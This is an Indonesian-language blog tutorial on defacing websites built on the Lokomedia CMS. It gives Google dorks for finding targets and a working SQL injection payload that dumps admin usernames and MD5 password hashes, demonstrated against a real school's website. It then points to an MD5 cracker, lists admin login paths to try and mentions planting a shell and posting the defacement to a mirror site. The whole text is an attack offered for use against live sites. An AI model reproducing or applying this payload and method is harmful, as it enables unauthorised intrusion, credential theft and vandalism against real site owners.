Cara Deface Sqli Cms Lokomedia

Hai para Jomblo Lovers :) Ketemu lagi Sama Saya Prof.zonk Kali ini Saya Akan share Cara Deface Sqli Cms Lokomedia Tehnik Ini Adalah Salah Satu Tehnik Yang Sering Dipakai Oleh Defacer Lainnya , Tutor Ini Adalah Tehnik untuk mendapatkan Username Dan Password (Masih Dalam Kondisi Md5 ) Suatu website Tetapi untuk mencari Halaman Admin Loginnya Silahkan Anda Cari sendiri (use your brain)

Tutorialnyo : 

1.Masukan Dork Di bawah Ini Ke Google

- inurl:statis-1-profil.html

- inurl:statis-2-profil.html

- inurl:statis-3-strukturorganisasi.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html

Kalian Bisa Tambahkan Site:.org Atau Domain Lainnya Sesuai Imajinasi Otak Kalian

2.Pilih Salah Satu Website yang Ingin Di Begal :v

 3.Setelah Masuk Ke web nya , Kita Tambahkan Exploit Berikut

    'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Contoh:

http://sman8malang.sch.id/statis-1-pengantar.html

Change Seperti Dibawah

sman8malang.sch.id/statis-1'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-pengantar.html

Dan Klik Enter

4.Ciri Ciri Web Yang Vuln Seperti Gambar Dibawah

5.Tekan Tombol Ctrl + U Atau Klik Kanan Dan Pilih View Page Source

6.Ketemu Deh Admin Dan Passwordnya(Md 5) kerena Masih berbentuk md5 , kalian bisa menggunakan 

https://hashkiller.co.uk/md5-decrypter.aspx

7.Setelah Itu Tinggal Cari Admin Loginnya Aja

-  www.targetloh.com/admin

-  www.targetloh.com/adminweb

-  www.targetloh.com/administrator

-   www.targetloh.com/redaktur

Atau Bisa Kalian Cari menggunakan Aplikasi Admin Finder

8.Kalo nanam Shell Nya Pikir Sendiri (jangan Mau Di suapiin Teyus)

selesai deh tinggal Share Ke website Mirror
Jangan lupa kunjungi www.grupmerahputih.blogspot.co.id lagi 

loading...